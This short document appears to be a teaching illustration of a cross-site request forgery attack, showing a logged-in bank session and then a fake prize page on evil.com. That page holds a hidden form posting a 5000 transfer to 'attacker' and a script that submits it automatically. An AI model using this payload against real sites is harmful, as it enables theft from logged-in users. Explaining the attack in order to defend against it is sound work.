https://bank.com/account
Welcome back, Alex
You are logged in. Your session cookie is set for bank.com.
https://evil.com/win-a-prize
🎉 You've won!
Just click anywhere to claim your reward...
<form action="bank.com/transfer">
<input name="to" value="attacker">
<input name="amount" value="5000">
</form>
<script>form.submit()</script>